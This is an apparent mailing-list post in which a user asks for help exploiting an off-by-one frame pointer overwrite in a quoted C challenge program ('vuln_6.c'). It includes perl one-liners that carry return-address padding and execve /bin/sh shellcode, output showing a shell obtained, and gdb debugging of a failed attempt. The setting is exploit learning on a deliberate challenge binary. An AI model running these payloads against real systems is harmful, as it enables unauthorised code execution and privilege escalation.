Hey guys, I'm having some trouble with frame pointer overwriting, and I was wondering if anyone could shed any light on this. First of all, here is the vulnerable program: mikecc@darkstar frame $ cat vuln_6.c
/* Is It Vulnerable!? you sure? check again! */
/*
 * bob.dtors.net
 *
 * ---------------------------------------------------
 * Dtors Security Research (DSR)
 * Code by: bob
 * Mail: bobat_private
 * ---------------------------------------------------
 *
 * Build it and exploit it
 * show us the exploitation log and get extra rights !!
 *
 *
 * Is It Vulnerable!? you sure? check again!
 * -- this code was taken from bob's personal homepage
 * http://it.dtors.net
 */
#include <stdio.h>
#include <string.h>
/* NOTE(review): exit() is called in main without <stdlib.h>; the build relies on
 * an implicit declaration, which C99 and later reject. */

#define SIZE 256

/*
 * Copies the caller-supplied string into a fixed 256-byte stack buffer and
 * hex-dumps the buffer.
 *
 * ptr: NUL-terminated string to copy (argv[1] from main, i.e. untrusted input).
 */
void bob(char *ptr)
{
    char buffer[SIZE];
    /* BUG: the bound is SIZE+1 but buffer holds SIZE bytes, so an argument of
     * 256 bytes or more writes one byte past the end of buffer[]. Which object
     * that byte lands on depends on the compiler's frame layout; the discussion
     * below treats it as the saved frame pointer. strncpy also leaves buffer
     * without a terminating NUL when ptr is that long. */
    strncpy(buffer, ptr, SIZE+1);
    /* Discloses the stack address of buffer (presumably intentional for the
     * challenge). */
    printf("buffer is at %p\n",buffer);
    {
        int a,b;
        /* a<=SIZE also reads buffer[SIZE], one element past the array, so 257
         * bytes are printed; that is the extra trailing byte in the dumps below.
         * b advances 3 per byte ("xx ") and forces a newline every 26 bytes. */
        for (a=b=0;a<=SIZE;a++,b+=3) {
            if (b!=0 && !(b%26)) printf("\n");
            printf("%02x ", (unsigned char)buffer[a]);
        }
        printf("\n");
    }
}

/* Requires exactly one argument; envp is accepted but unused. */
int main(int argc, char **argv, char **envp)
{
    if (argc < 2) {
        /* this literal appears to have been rewritten by the list archive's
         * address munging */
        fprintf(stdout, "bobat_private\n");
        exit(1);
    }
    bob(argv[1]);
    return 0;
}
mikecc@darkstar frame $ Now, I can exploit this if I store the shellcode in the environment: mikecc@darkstar frame $ ./6 `perl -e 'print "\xd0\xfd\xff\xbf"x64 . 
"\x00"'` buffer is at 0xbffff4a8 d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf d0 fd ff bf 00 sh-2.05b$ But, I do not understand how to find the overflow byte, or why this one works: \x00 Now since I am researching a remote frame pointer overwrite, I need to learn how to store the exploit string in the command line: mikecc@darkstar frame $ ./6 `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\xe3\x52\x53\x89\xe1\xcd\x80\x90\x90" . "\x63\xf9\xff\xbf"x58 . 
"\x09"'` buffer is at 0xbffff6a8 6a 0b 58 99 52 68 6e 2f 73 68 68 2f 2f 62 69 e3 52 53 89 e1 cd 80 90 90 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 63 f9 ff bf 00 Illegal instruction (core dumped) mikecc@darkstar frame $ When I open up the core dump, I check ebp: (gdb) i reg ebp ebp 0xbffff963 0xbffff963 (gdb) Now since I cannot copy and paste weird ASCII characters in Evolution, I do: x/s $ebp and it shows my shellcode. Why is this not executing a shell? Thanks, Mike